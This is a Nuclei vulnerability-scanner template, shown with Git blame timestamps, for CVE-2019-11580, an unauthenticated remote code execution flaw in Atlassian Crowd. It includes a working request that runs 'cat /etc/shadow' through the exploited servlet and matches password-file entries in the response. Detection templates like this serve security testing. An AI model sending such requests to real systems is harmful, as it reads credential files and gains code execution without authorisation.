nuclei-templates/cves/2019/CVE-2019-11580.yaml

39 lines
1.4 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-11580
2020-08-16 15:54:45 +00:00
info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,atlassian,rce
2020-08-16 15:54:45 +00:00
2021-03-26 06:43:58 +00:00
description: |
Atlassian Crowd and Crowd Data Center
had the pdkinstall development plugin incorrectly enabled in release builds.
Attackers who can send unauthenticated or authenticated requests
to a Crowd or Crowd Data Center instance can exploit this vulnerability
to install arbitrary plugins, which permits remote code execution on
systems running a vulnerable version of Crowd or Crowd Data Center.
All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
reference:
- https://github.com/jas502n/CVE-2019-11580
2021-03-26 06:44:13 +00:00
- https://jira.atlassian.com/browse/CWD-5388
2020-08-16 15:54:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
part: body
- type: status
status:
- 200